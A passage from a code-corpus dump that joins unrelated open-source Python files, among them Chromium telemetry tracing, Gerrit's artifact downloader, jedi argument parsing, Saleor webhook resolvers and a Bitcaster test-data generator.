print(("[Parser] Entries: {} (%-of-GT: {:.2%}); Overall references {} (%-of-GT: {:.2%}); " +
"Found {} of GT references ({:.2%}). Found {} references not in GT (%-of-Parser-Refs: {:.2%}). Self-references: {}").format(
p_len, p_len / gt_len, p_overall_references, p_overall_references / gt_overall_references,
p_hit, p_hit / gt_overall_references, p_miss, p_miss / p_overall_references, p_self)
)
|
the-stack_0_1537 | # Copyright 2021 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
from ament_cmake_python import find_packages_data
class TestFindPackagesData(unittest.TestCase):
def test_all_packages_data_is_found(self):
data = find_packages_data()
assert set(data) == {'foo', 'foo.bar', 'baz'}
assert set(data['foo']) == {'data', 'data.txt'}
assert set(data['foo.bar']) == {
'data.txt',
os.path.join('resources', 'fizz.txt'),
os.path.join('resources', 'buzz.txt')
}
assert set(data['baz']) == {'data.bin', 'data'}
def test_whole_package_data_is_included(self):
data = find_packages_data(
include=('foo', 'foo.*'))
assert set(data) == {'foo', 'foo.bar'}
assert set(data['foo']) == {'data', 'data.txt'}
assert set(data['foo.bar']) == {
'data.txt',
os.path.join('resources', 'fizz.txt'),
os.path.join('resources', 'buzz.txt')
}
def test_whole_package_data_is_excluded(self):
data = find_packages_data(
include=('foo', 'foo.*'),
exclude=('foo.bar',))
assert set(data) == {'foo'}
assert set(data['foo']) == {'data', 'data.txt'}
def test_partial_package_data_is_excluded(self):
data = find_packages_data(
include=('foo', 'foo.*'),
exclude={'foo.bar': ['resources/*']})
assert set(data) == {'foo', 'foo.bar'}
assert set(data['foo']) == {'data', 'data.txt'}
assert set(data['foo.bar']) == {'data.txt'}
def test_partial_package_data_is_included(self):
data = find_packages_data(
include={
'foo': ['*.txt'],
'foo.*': ['resources/*.txt']
},
)
assert set(data) == {'foo', 'foo.bar'}
assert set(data['foo']) == {'data.txt'}
assert set(data['foo.bar']) == {
os.path.join('resources', 'fizz.txt'),
os.path.join('resources', 'buzz.txt')
}
def test_nested_packages_data_is_found(self):
data = find_packages_data(where='nested/pkgs')
assert set(data) == {'fizz', 'fizz.buzz'}
assert set(data['fizz']) == {
os.path.join('data', 'buzz.bin')
}
assert set(data['fizz.buzz']) == {'data.txt'}
if __name__ == '__main__':
unittest.main()
|
the-stack_0_1538 | """Classes for providing extra information about an :class:`ihm.Entity`"""
# Handle different naming of urllib in Python 2/3
try:
import urllib.request as urllib2
except ImportError:
import urllib2
import sys
class Reference(object):
"""Base class for extra information about an :class:`ihm.Entity`.
This class is not used directly; instead, use a subclass such as
:class:`Sequence` or :class:`UniProtSequence`. These objects are
then typically passed to the :class:`ihm.Entity` constructor."""
pass
class Sequence(Reference):
"""Point to the sequence of an :class:`ihm.Entity` in a sequence database;
convenience subclasses are provided for common sequence databases such
as :class:`UniProtSequence`.
These objects are typically passed to the :class:`ihm.Entity`
constructor.
See also :attr:`alignments` to describe the correspondence between
the database and entity sequences.
:param str db_name: The name of the database.
:param str db_code: The name of the sequence in the database.
:param str accession: The database accession.
:param str sequence: The complete sequence, as a string of
one-letter codes.
:param str details: Longer text describing the sequence.
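Illustrative example (the exact :class:`ihm.Entity` arguments may differ;
the values here are placeholders)::

    ref = ihm.reference.Sequence(
        db_name='MyDB', db_code='NUP84_YEAST', accession='P52891',
        sequence='MELS...')
    entity = ihm.Entity('MELS...', references=[ref])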
"""
def __init__(self, db_name, db_code, accession, sequence, details=None):
self.db_name, self.db_code, self.accession = db_name, db_code, accession
self.sequence, self.details = sequence, details
#: All alignments between the reference and entity sequences, as
#: :class:`Alignment` objects. If none are provided, a simple 1:1
#: alignment is assumed.
self.alignments = []
def _get_alignments(self):
if self.alignments:
return self.alignments
elif not hasattr(self, '_default_alignment'):
self._default_alignment = Alignment()
return [self._default_alignment]
class UniProtSequence(Sequence):
"""Point to the sequence of an :class:`ihm.Entity` in UniProt.
These objects are typically passed to the :class:`ihm.Entity`
constructor.
:param str db_code: The UniProt name (e.g. NUP84_YEAST)
:param str accession: The UniProt accession (e.g. P52891)
See :class:`Sequence` for a description of the remaining parameters.
"""
_db_name = 'UNP'
def __init__(self, db_code, accession, sequence, details=None):
super(UniProtSequence, self).__init__(
self._db_name, db_code, accession, sequence, details)
def __str__(self):
return "<ihm.reference.UniProtSequence(%s)>" % self.accession
@classmethod
def from_accession(cls, accession):
"""Create :class:`UniProtSequence` from just an accession.
This is done by querying the UniProt web API, so requires network
access.
:param str accession: The UniProt accession (e.g. P52891)
"""
# urlopen returns bytes
if sys.version_info[0] >= 3:
def decode(t):
return t.decode('ascii')
else:
decode = lambda t: t
url = 'https://www.uniprot.org/uniprot/%s.fasta' % accession
with urllib2.urlopen(url) as fh:
header = decode(fh.readline())
spl = header.split('|')
if len(spl) < 3 or spl[0] != '>sp':
raise ValueError("Cannot parse UniProt header %s" % header)
cd = spl[2].split(None, 1)
code = cd[0]
details = cd[1].rstrip('\r\n') if len(cd) > 1 else None
seq = decode(fh.read()).replace('\n', '')
return cls(code, accession, seq, details)
class Alignment(object):
"""A sequence range that aligns between the database and the entity.
This describes part of the sequence in the sequence database
(:class:`Sequence`) and in the :class:`ihm.Entity`. The two ranges
must be the same length and have the same primary sequence (any
differences must be described with :class:`SeqDif` objects).
:param int db_begin: The first residue in the database sequence
that is used (defaults to the entire sequence).
:param int db_end: The last residue in the database sequence
that is used (or None, the default, to use the entire sequence).
:param int entity_begin: The first residue in the :class:`~ihm.Entity`
sequence that is taken from the reference (defaults to the entire
entity sequence).
:param int entity_end: The last residue in the :class:`~ihm.Entity`
sequence that is taken from the reference (or None, the default,
to use the entire sequence).
:param seq_dif: Single-point mutations made to the sequence.
:type seq_dif: Sequence of :class:`SeqDif` objects.
"""
def __init__(self, db_begin=1, db_end=None, entity_begin=1,
entity_end=None, seq_dif=[]):
self.db_begin, self.db_end = db_begin, db_end
self.entity_begin, self.entity_end = entity_begin, entity_end
self.seq_dif = []
self.seq_dif.extend(seq_dif)
class SeqDif(object):
"""Annotate a sequence difference between a reference and entity sequence.
See :class:`Alignment`.
:param int seq_id: The residue index in the entity sequence.
:param db_monomer: The monomer type (as a :class:`~ihm.ChemComp` object)
in the reference sequence.
:type db_monomer: :class:`ihm.ChemComp`
:param monomer: The monomer type (as a :class:`~ihm.ChemComp` object)
in the entity sequence.
:type monomer: :class:`ihm.ChemComp`
:param str details: Descriptive text for the sequence difference.
"""
def __init__(self, seq_id, db_monomer, monomer, details=None):
self.seq_id, self.db_monomer, self.monomer = seq_id, db_monomer, monomer
self.details = details
|
the-stack_0_1539 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import logging
import socket
import time
import traceback
from telemetry import decorators
from telemetry.internal.backends.chrome_inspector import inspector_websocket
from telemetry.internal.backends.chrome_inspector import websocket
from tracing.trace_data import trace_data as trace_data_module
class TracingUnsupportedException(Exception):
pass
class TracingTimeoutException(Exception):
pass
class TracingUnrecoverableException(Exception):
pass
class TracingHasNotRunException(Exception):
pass
class TracingUnexpectedResponseException(Exception):
pass
class ClockSyncResponseException(Exception):
pass
class _DevToolsStreamReader(object):
def __init__(self, inspector_socket, stream_handle):
self._inspector_websocket = inspector_socket
self._handle = stream_handle
self._trace_file_handle = None
self._callback = None
def Read(self, callback):
# Do not allow the instance of this class to be reused, as
# we only read data sequentially at the moment, so a stream
# can only be read once.
assert not self._callback
self._trace_file_handle = trace_data_module.TraceFileHandle()
self._trace_file_handle.Open()
self._callback = callback
self._ReadChunkFromStream()
# The below is not a typo -- queue one extra read ahead to avoid latency.
self._ReadChunkFromStream()
def _ReadChunkFromStream(self):
# Limit max block size to avoid fragmenting memory in sock.recv(),
# (see https://github.com/liris/websocket-client/issues/163 for details)
req = {'method': 'IO.read', 'params': {
'handle': self._handle, 'size': 32768}}
self._inspector_websocket.AsyncRequest(req, self._GotChunkFromStream)
def _GotChunkFromStream(self, response):
# Quietly discard responses from reads queued ahead after EOF.
if self._trace_file_handle is None:
return
if 'error' in response:
raise TracingUnrecoverableException(
'Reading trace failed: %s' % response['error']['message'])
result = response['result']
# Convert the trace data that's received as UTF-32 to its native encoding of
# UTF-8 in order to reduce its size.
self._trace_file_handle.AppendTraceData(result['data'].encode('utf8'))
if not result.get('eof', False):
self._ReadChunkFromStream()
return
req = {'method': 'IO.close', 'params': {'handle': self._handle}}
self._inspector_websocket.SendAndIgnoreResponse(req)
self._trace_file_handle.Close()
self._callback(self._trace_file_handle)
self._trace_file_handle = None
class TracingBackend(object):
_TRACING_DOMAIN = 'Tracing'
def __init__(self, inspector_socket, is_tracing_running=False,
support_modern_devtools_tracing_start_api=False):
self._inspector_websocket = inspector_socket
self._inspector_websocket.RegisterDomain(
self._TRACING_DOMAIN, self._NotificationHandler)
self._is_tracing_running = is_tracing_running
self._start_issued = False
self._can_collect_data = False
self._has_received_all_tracing_data = False
self._support_modern_devtools_tracing_start_api = (
support_modern_devtools_tracing_start_api)
self._trace_data_builder = None
@property
def is_tracing_running(self):
return self._is_tracing_running
def StartTracing(self, chrome_trace_config, timeout=10):
"""When first called, starts tracing, and returns True.
If called during tracing, tracing is unchanged, and it returns False.
"""
if self.is_tracing_running:
return False
assert not self._can_collect_data, 'Data not collected from last trace.'
# Reset collected tracing data from previous tracing calls.
if not self.IsTracingSupported():
raise TracingUnsupportedException(
'Chrome tracing not supported for this app.')
params = {'transferMode': 'ReturnAsStream'}
if self._support_modern_devtools_tracing_start_api:
params['traceConfig'] = (
chrome_trace_config.GetChromeTraceConfigForDevTools())
else:
if chrome_trace_config.requires_modern_devtools_tracing_start_api:
raise TracingUnsupportedException(
'Trace options require modern Tracing.start DevTools API, '
'which is NOT supported by the browser')
params['categories'], params['options'] = (
chrome_trace_config.GetChromeTraceCategoriesAndOptionsForDevTools())
req = {'method': 'Tracing.start', 'params': params}
logging.info('Start Tracing Request: %r', req)
response = self._inspector_websocket.SyncRequest(req, timeout)
if 'error' in response:
raise TracingUnexpectedResponseException(
'Inspector returned unexpected response for '
'Tracing.start:\n' + json.dumps(response, indent=2))
self._is_tracing_running = True
self._start_issued = True
return True
def RecordClockSyncMarker(self, sync_id):
assert self.is_tracing_running, 'Tracing must be running to clock sync.'
req = {
'method': 'Tracing.recordClockSyncMarker',
'params': {
'syncId': sync_id
}
}
rc = self._inspector_websocket.SyncRequest(req, timeout=2)
if 'error' in rc:
raise ClockSyncResponseException(rc['error']['message'])
def StopTracing(self):
"""Stops tracing and pushes results to the supplied TraceDataBuilder.
If this is called after tracing has been stopped, trace data from the last
tracing run is pushed.
"""
if not self.is_tracing_running:
raise TracingHasNotRunException()
else:
if not self._start_issued:
# Tracing is running but start was not issued so, startup tracing must
# be in effect. Issue another Tracing.start to update the transfer mode.
# TODO(caseq): get rid of it when streaming is the default.
params = {
'transferMode': 'ReturnAsStream',
'traceConfig': {}
}
req = {'method': 'Tracing.start', 'params': params}
self._inspector_websocket.SendAndIgnoreResponse(req)
req = {'method': 'Tracing.end'}
self._inspector_websocket.SendAndIgnoreResponse(req)
self._is_tracing_running = False
self._start_issued = False
self._can_collect_data = True
def DumpMemory(self, timeout=30):
"""Dumps memory.
Returns:
GUID of the generated dump if successful, None otherwise.
Raises:
TracingTimeoutException: If more than |timeout| seconds has passed
since the last time any data is received.
TracingUnrecoverableException: If there is a websocket error.
TracingUnexpectedResponseException: If the response contains an error
or does not contain the expected result.
"""
request = {
'method': 'Tracing.requestMemoryDump'
}
try:
response = self._inspector_websocket.SyncRequest(request, timeout)
except websocket.WebSocketTimeoutException:
raise TracingTimeoutException(
'Exception raised while sending a Tracing.requestMemoryDump '
'request:\n' + traceback.format_exc())
except (socket.error, websocket.WebSocketException,
inspector_websocket.WebSocketDisconnected):
raise TracingUnrecoverableException(
'Exception raised while sending a Tracing.requestMemoryDump '
'request:\n' + traceback.format_exc())
if ('error' in response or
'result' not in response or
'success' not in response['result'] or
'dumpGuid' not in response['result']):
raise TracingUnexpectedResponseException(
'Inspector returned unexpected response for '
'Tracing.requestMemoryDump:\n' + json.dumps(response, indent=2))
result = response['result']
return result['dumpGuid'] if result['success'] else None
def CollectTraceData(self, trace_data_builder, timeout=60):
if not self._can_collect_data:
raise Exception('Cannot collect before tracing is finished.')
self._CollectTracingData(trace_data_builder, timeout)
self._can_collect_data = False
def _CollectTracingData(self, trace_data_builder, timeout):
"""Collects tracing data. Assumes that Tracing.end has already been sent.
Args:
trace_data_builder: An instance of TraceDataBuilder to put results into.
timeout: The timeout in seconds.
Raises:
TracingTimeoutException: If more than |timeout| seconds has passed
since the last time any data is received.
TracingUnrecoverableException: If there is a websocket error.
"""
self._has_received_all_tracing_data = False
start_time = time.time()
self._trace_data_builder = trace_data_builder
try:
while True:
try:
self._inspector_websocket.DispatchNotifications(timeout)
start_time = time.time()
except websocket.WebSocketTimeoutException:
pass
except (socket.error, websocket.WebSocketException):
raise TracingUnrecoverableException(
'Exception raised while collecting tracing data:\n' +
traceback.format_exc())
if self._has_received_all_tracing_data:
break
elapsed_time = time.time() - start_time
if elapsed_time > timeout:
raise TracingTimeoutException(
'Only received partial trace data due to timeout after %s '
'seconds. If the trace data is big, you may want to increase '
'the timeout amount.' % elapsed_time)
finally:
self._trace_data_builder = None
def _NotificationHandler(self, res):
if 'Tracing.dataCollected' == res.get('method'):
value = res.get('params', {}).get('value')
self._trace_data_builder.AddTraceFor(
trace_data_module.CHROME_TRACE_PART, value)
elif 'Tracing.tracingComplete' == res.get('method'):
stream_handle = res.get('params', {}).get('stream')
if not stream_handle:
self._has_received_all_tracing_data = True
return
reader = _DevToolsStreamReader(self._inspector_websocket, stream_handle)
reader.Read(self._ReceivedAllTraceDataFromStream)
def _ReceivedAllTraceDataFromStream(self, trace_handle):
self._trace_data_builder.AddTraceFor(
trace_data_module.CHROME_TRACE_PART, trace_handle)
self._has_received_all_tracing_data = True
def Close(self):
self._inspector_websocket.UnregisterDomain(self._TRACING_DOMAIN)
self._inspector_websocket = None
@decorators.Cache
def IsTracingSupported(self):
req = {'method': 'Tracing.hasCompleted'}
res = self._inspector_websocket.SyncRequest(req, timeout=10)
return not res.get('response')
|
the-stack_0_1540 | import graphene
from graphql_jwt.exceptions import PermissionDenied
from ...core.permissions import WebhookPermissions
from ...webhook import models, payloads
from ...webhook.event_types import WebhookEventType
from ..utils import sort_queryset
from .sorters import WebhookSortField
from .types import Webhook, WebhookEvent
def resolve_webhooks(info, sort_by=None, **_kwargs):
service_account = info.context.service_account
if service_account:
qs = models.Webhook.objects.filter(service_account=service_account)
else:
user = info.context.user
if not user.has_perm(WebhookPermissions.MANAGE_WEBHOOKS):
raise PermissionDenied()
qs = models.Webhook.objects.all()
return sort_queryset(qs, sort_by, WebhookSortField)
def resolve_webhook(info, webhook_id):
service_account = info.context.service_account
if service_account:
_, webhook_id = graphene.Node.from_global_id(webhook_id)
return service_account.webhooks.filter(id=webhook_id).first()
user = info.context.user
if user.has_perm(WebhookPermissions.MANAGE_WEBHOOKS):
return graphene.Node.get_node_from_global_id(info, webhook_id, Webhook)
raise PermissionDenied()
def resolve_webhook_events():
return [
WebhookEvent(event_type=event_type[0])
for event_type in WebhookEventType.CHOICES
]
def resolve_sample_payload(info, event_name):
service_account = info.context.service_account
required_permission = WebhookEventType.PERMISSIONS.get(event_name)
if required_permission:
if service_account and service_account.has_perm(required_permission):
return payloads.generate_sample_payload(event_name)
if info.context.user.has_perm(required_permission):
return payloads.generate_sample_payload(event_name)
raise PermissionDenied()
|
the-stack_0_1541 | import factory
USERS = 1000
GROUPS = 5
EVENTS = 5
NOTIFICATIONS = 5000
OCCURENCES = 2000
AUDITLOGS = 1000
if __name__ == '__main__': # noqa: C901
import os
import random
from django.core.wsgi import get_wsgi_application
os.environ['DJANGO_SETTINGS_MODULE'] = 'bitcaster.config.settings'
application = get_wsgi_application()
from bitcaster.models import Organization, Subscription, Notification, Event
from bitcaster.utils.tests import factories
org = Organization.objects.first()
app = factories.ApplicationFactory(organization=org, name='Dummy1')
users = []
for i in range(0, USERS):
print('.', end='')
user = factories.UserFactory(email='user%[email protected]' % i)
org_member = factories.OrganizationMemberFactory(organization=org, user=user)
users.append(org_member)
factories.ApplicationMemberFactory(application=app, org_member=org_member)
assert Organization.objects.count() == 1
if not users:
users = list(org.memberships.all())
channels = list(org.channels.all())
for i in range(0, GROUPS):
group = factories.OrganizationGroupFactory(organization=org, name='Group-%s' % i)
assert Organization.objects.count() == 1
if not group.members.exists():
members = random.sample(users, random.randint(5, 15))
for m in members:
group.members.add(m)
for i in range(0, EVENTS):
event = factories.EventFactory(application=app, enabled=True, name='Event-%s' % i)
assert Organization.objects.count() == 1
chs = random.sample(channels, random.randint(1, 5))
for ch in chs:
event.channels.add(ch)
factories.MessageFactory(event=event,
channel=ch, body='test')
members = random.sample(users, random.randint(5, 300))
for m in members:
ch = random.choice(chs)
factories.AddressFactory(user=m.user, address='123')
assert Organization.objects.count() == 1
factories.SubscriptionFactory(subscriber=m.user,
trigger_by=m.user,
channel=ch,
event=event)
assert Organization.objects.count() == 1
fld = Notification._meta.get_field('timestamp')
fld.auto_now_add = False
Notification.timestamp.auto_now_add = False
events = list(app.events.all())
subscriptions = list(Subscription.objects.filter(event__application=app))
# Notification Log
for i in range(NOTIFICATIONS):
subscription = random.choice(subscriptions)
factories.NotificationFactory(id=i,
application=app,
event=subscription.event,
subscription=subscription,
channel=subscription.channel)
assert Organization.objects.count() == 1
# Occurrence log
for i in range(OCCURENCES):
factories.OccurenceFactory(id=i,
organization=org,
application=app,
event=factory.LazyAttribute(lambda a: Event.objects.order_by('?').first()))
# Audit Log
for i in range(AUDITLOGS):
e = factories.AuditLogEntryFactory(id=i,
organization=org,
)
|
the-stack_0_1543 | #!/usr/bin/env python
# Copyright (C) 2013 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from hashlib import sha1
from optparse import OptionParser
from os import link, makedirs, path, remove
import shutil
from subprocess import check_call, CalledProcessError
from sys import stderr
from util import hash_file, resolve_url
from zipfile import ZipFile, BadZipfile, LargeZipFile
GERRIT_HOME = path.expanduser('~/.gerritcodereview')
# TODO(davido): Rename in bazel-cache
CACHE_DIR = path.join(GERRIT_HOME, 'buck-cache', 'downloaded-artifacts')
LOCAL_PROPERTIES = 'local.properties'
def safe_mkdirs(d):
if path.isdir(d):
return
try:
makedirs(d)
except OSError as err:
if not path.isdir(d):
raise err
def download_properties(root_dir):
""" Get the download properties.
First tries to find the properties file in the given root directory,
and if not found there, tries in the Gerrit settings folder in the
user's home directory.
Returns a set of download properties, which may be empty.
"""
p = {}
local_prop = path.join(root_dir, LOCAL_PROPERTIES)
if not path.isfile(local_prop):
local_prop = path.join(GERRIT_HOME, LOCAL_PROPERTIES)
if path.isfile(local_prop):
try:
with open(local_prop) as fd:
for line in fd:
if line.startswith('download.'):
d = [e.strip() for e in line.split('=', 1)]
name, url = d[0], d[1]
p[name[len('download.'):]] = url
except OSError:
pass
return p
def cache_entry(args):
if args.v:
h = args.v
else:
h = sha1(args.u.encode('utf-8')).hexdigest()
name = '%s-%s' % (path.basename(args.o), h)
return path.join(CACHE_DIR, name)
opts = OptionParser()
opts.add_option('-o', help='local output file')
opts.add_option('-u', help='URL to download')
opts.add_option('-v', help='expected content SHA-1')
opts.add_option('-x', action='append', help='file to delete from ZIP')
opts.add_option('--exclude_java_sources', action='store_true')
opts.add_option('--unsign', action='store_true')
args, _ = opts.parse_args()
root_dir = args.o
while root_dir and path.dirname(root_dir) != root_dir:
root_dir, n = path.split(root_dir)
if n == 'WORKSPACE':
break
redirects = download_properties(root_dir)
cache_ent = cache_entry(args)
src_url = resolve_url(args.u, redirects)
if not path.exists(cache_ent):
try:
safe_mkdirs(path.dirname(cache_ent))
except OSError as err:
print('error creating directory %s: %s' %
(path.dirname(cache_ent), err), file=stderr)
exit(1)
print('Download %s' % src_url, file=stderr)
try:
check_call(['curl', '--proxy-anyauth', '-ksSfLo', cache_ent, src_url])
except OSError as err:
print('could not invoke curl: %s\nis curl installed?' % err, file=stderr)
exit(1)
except CalledProcessError as err:
print('error using curl: %s' % err, file=stderr)
exit(1)
if args.v:
have = hash_file(sha1(), cache_ent).hexdigest()
if args.v != have:
print((
'%s:\n' +
'expected %s\n' +
'received %s\n') % (src_url, args.v, have), file=stderr)
try:
remove(cache_ent)
except OSError as err:
if path.exists(cache_ent):
print('error removing %s: %s' % (cache_ent, err), file=stderr)
exit(1)
exclude = []
if args.x:
exclude += args.x
if args.exclude_java_sources:
try:
with ZipFile(cache_ent, 'r') as zf:
for n in zf.namelist():
if n.endswith('.java'):
exclude.append(n)
except (BadZipfile, LargeZipFile) as err:
print('error opening %s: %s' % (cache_ent, err), file=stderr)
exit(1)
if args.unsign:
try:
with ZipFile(cache_ent, 'r') as zf:
for n in zf.namelist():
if (n.endswith('.RSA')
or n.endswith('.SF')
or n.endswith('.LIST')):
exclude.append(n)
except (BadZipfile, LargeZipFile) as err:
print('error opening %s: %s' % (cache_ent, err), file=stderr)
exit(1)
safe_mkdirs(path.dirname(args.o))
if exclude:
try:
shutil.copyfile(cache_ent, args.o)
except (shutil.Error, IOError) as err:
print('error copying to %s: %s' % (args.o, err), file=stderr)
exit(1)
try:
check_call(['zip', '-d', args.o] + exclude)
except CalledProcessError as err:
print('error removing files from zip: %s' % err, file=stderr)
exit(1)
else:
try:
link(cache_ent, args.o)
except OSError as err:
try:
shutil.copyfile(cache_ent, args.o)
except (shutil.Error, IOError) as err:
print('error copying to %s: %s' % (args.o, err), file=stderr)
exit(1)
|
the-stack_0_1546 | import re
from parso.python import tree
from jedi._compatibility import zip_longest
from jedi import debug
from jedi.evaluate import analysis
from jedi.evaluate.lazy_context import LazyKnownContext, LazyKnownContexts, \
LazyTreeContext, get_merged_lazy_context
from jedi.evaluate.filters import ParamName
from jedi.evaluate.base_context import NO_CONTEXTS
from jedi.evaluate.context import iterable
from jedi.evaluate.param import get_executed_params, ExecutedParam
def try_iter_content(types, depth=0):
"""Helper method for static analysis."""
if depth > 10:
# It's possible that a loop has references on itself (especially with
# CompiledObject). Therefore don't loop infinitely.
return
for typ in types:
try:
f = typ.py__iter__
except AttributeError:
pass
else:
for lazy_context in f():
try_iter_content(lazy_context.infer(), depth + 1)
def repack_with_argument_clinic(string, keep_arguments_param=False):
"""
Transforms a function or method with arguments to the signature that is
given as an argument clinic notation.
Argument clinic is part of CPython and used for all the functions that are
implemented in C (Python 3.7):
str.split.__text_signature__
# Results in: '($self, /, sep=None, maxsplit=-1)'
"""
clinic_args = list(_parse_argument_clinic(string))
def decorator(func):
def wrapper(*args, **kwargs):
if keep_arguments_param:
arguments = kwargs['arguments']
else:
arguments = kwargs.pop('arguments')
try:
args += tuple(_iterate_argument_clinic(arguments, clinic_args))
except ValueError:
return NO_CONTEXTS
else:
return func(*args, **kwargs)
return wrapper
return decorator
def _iterate_argument_clinic(arguments, parameters):
"""Uses a list with argument clinic information (see PEP 436)."""
iterator = arguments.unpack()
for i, (name, optional, allow_kwargs) in enumerate(parameters):
key, argument = next(iterator, (None, None))
if key is not None:
debug.warning('Keyword arguments in argument clinic are currently not supported.')
raise ValueError
if argument is None and not optional:
debug.warning('TypeError: %s expected at least %s arguments, got %s',
name, len(parameters), i)
raise ValueError
context_set = NO_CONTEXTS if argument is None else argument.infer()
if not context_set and not optional:
# For the stdlib we always want values. If we don't get them,
# that's ok, maybe something is too hard to resolve, however,
# we will not proceed with the evaluation of that function.
debug.warning('argument_clinic "%s" not resolvable.', name)
raise ValueError
yield context_set
def _parse_argument_clinic(string):
allow_kwargs = False
optional = False
while string:
# Optional arguments have to begin with a bracket. And should always be
# at the end of the arguments. This is therefore not a proper argument
        # clinic implementation. `range()` for example allows an optional start
        # value at the beginning.
        match = re.match(r'(?:(?:(\[),? ?|, ?|)(\w+)|, ?/)\]*', string)
string = string[len(match.group(0)):]
if not match.group(2): # A slash -> allow named arguments
allow_kwargs = True
continue
optional = optional or bool(match.group(1))
word = match.group(2)
yield (word, optional, allow_kwargs)
class AbstractArguments(object):
context = None
argument_node = None
trailer = None
def eval_all(self, funcdef=None):
"""
Evaluates all arguments as a support for static analysis
(normally Jedi).
"""
for key, lazy_context in self.unpack():
types = lazy_context.infer()
try_iter_content(types)
def get_calling_nodes(self):
return []
def unpack(self, funcdef=None):
raise NotImplementedError
def get_executed_params(self, execution_context):
return get_executed_params(execution_context, self)
class AnonymousArguments(AbstractArguments):
def get_executed_params(self, execution_context):
from jedi.evaluate.dynamic import search_params
return search_params(
execution_context.evaluator,
execution_context,
execution_context.tree_node
)
def __repr__(self):
return '%s()' % self.__class__.__name__
class TreeArguments(AbstractArguments):
def __init__(self, evaluator, context, argument_node, trailer=None):
"""
The argument_node is either a parser node or a list of evaluated
objects. Those evaluated objects may be lists of evaluated objects
themselves (one list for the first argument, one for the second, etc).
:param argument_node: May be an argument_node or a list of nodes.
"""
self.argument_node = argument_node
self.context = context
self._evaluator = evaluator
self.trailer = trailer # Can be None, e.g. in a class definition.
def _split(self):
if self.argument_node is None:
return
# Allow testlist here as well for Python2's class inheritance
# definitions.
if not (self.argument_node.type in ('arglist', 'testlist') or (
# in python 3.5 **arg is an argument, not arglist
(self.argument_node.type == 'argument') and
self.argument_node.children[0] in ('*', '**'))):
yield 0, self.argument_node
return
iterator = iter(self.argument_node.children)
for child in iterator:
if child == ',':
continue
elif child in ('*', '**'):
yield len(child.value), next(iterator)
elif child.type == 'argument' and \
child.children[0] in ('*', '**'):
assert len(child.children) == 2
yield len(child.children[0].value), child.children[1]
else:
yield 0, child
def unpack(self, funcdef=None):
named_args = []
for star_count, el in self._split():
if star_count == 1:
arrays = self.context.eval_node(el)
iterators = [_iterate_star_args(self.context, a, el, funcdef)
for a in arrays]
for values in list(zip_longest(*iterators)):
# TODO zip_longest yields None, that means this would raise
# an exception?
yield None, get_merged_lazy_context(
[v for v in values if v is not None]
)
elif star_count == 2:
arrays = self.context.eval_node(el)
for dct in arrays:
for key, values in _star_star_dict(self.context, dct, el, funcdef):
yield key, values
else:
if el.type == 'argument':
c = el.children
if len(c) == 3: # Keyword argument.
named_args.append((c[0].value, LazyTreeContext(self.context, c[2]),))
else: # Generator comprehension.
# Include the brackets with the parent.
comp = iterable.GeneratorComprehension(
self._evaluator, self.context, self.argument_node.parent)
yield None, LazyKnownContext(comp)
else:
yield None, LazyTreeContext(self.context, el)
# Reordering var_args is necessary, because star args sometimes appear
# after named argument, but in the actual order it's prepended.
for named_arg in named_args:
yield named_arg
def as_tree_tuple_objects(self):
for star_count, argument in self._split():
if argument.type == 'argument':
argument, default = argument.children[::2]
else:
default = None
yield argument, default, star_count
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.argument_node)
def get_calling_nodes(self):
from jedi.evaluate.dynamic import DynamicExecutedParams
old_arguments_list = []
arguments = self
while arguments not in old_arguments_list:
if not isinstance(arguments, TreeArguments):
break
old_arguments_list.append(arguments)
for name, default, star_count in reversed(list(arguments.as_tree_tuple_objects())):
if not star_count or not isinstance(name, tree.Name):
continue
names = self._evaluator.goto(arguments.context, name)
if len(names) != 1:
break
if not isinstance(names[0], ParamName):
break
param = names[0].get_param()
if isinstance(param, DynamicExecutedParams):
# For dynamic searches we don't even want to see errors.
return []
if not isinstance(param, ExecutedParam):
break
if param.var_args is None:
break
arguments = param.var_args
break
if arguments.argument_node is not None:
return [arguments.argument_node]
if arguments.trailer is not None:
return [arguments.trailer]
return []
class ValuesArguments(AbstractArguments):
def __init__(self, values_list):
self._values_list = values_list
def unpack(self, funcdef=None):
for values in self._values_list:
yield None, LazyKnownContexts(values)
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self._values_list)
def _iterate_star_args(context, array, input_node, funcdef=None):
try:
iter_ = array.py__iter__
except AttributeError:
if funcdef is not None:
# TODO this funcdef should not be needed.
m = "TypeError: %s() argument after * must be a sequence, not %s" \
% (funcdef.name.value, array)
analysis.add(context, 'type-error-star', input_node, message=m)
else:
for lazy_context in iter_():
yield lazy_context
def _star_star_dict(context, array, input_node, funcdef):
from jedi.evaluate.context.instance import CompiledInstance
if isinstance(array, CompiledInstance) and array.name.string_name == 'dict':
# For now ignore this case. In the future add proper iterators and just
# make one call without crazy isinstance checks.
return {}
elif isinstance(array, iterable.Sequence) and array.array_type == 'dict':
return array.exact_key_items()
else:
if funcdef is not None:
m = "TypeError: %s argument after ** must be a mapping, not %s" \
% (funcdef.name.value, array)
analysis.add(context, 'type-error-star-star', input_node, message=m)
return {}
|
the-stack_0_1547 | import json
class PEXEL:
def __init__(self, annotations_file):
print("Loading captions from pexels dataset ...")
self.annotations_file = annotations_file
self.dataset = dict()
self.anns = dict()
if not annotations_file == None:
self.dataset = json.load(open(annotations_file, 'r'))
self.createIndex()
def createIndex(self):
anns = {}
for entry in self.dataset:
anns[int(entry['_id'])] = entry['annotation']
self.anns = anns
print('pexels: loaded {} captions'.format(len(anns)))
def getImgPath(self, id):
return 'img_{}.jpg'.format(id)
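# Assumed shape of the annotations file, inferred from createIndex() above
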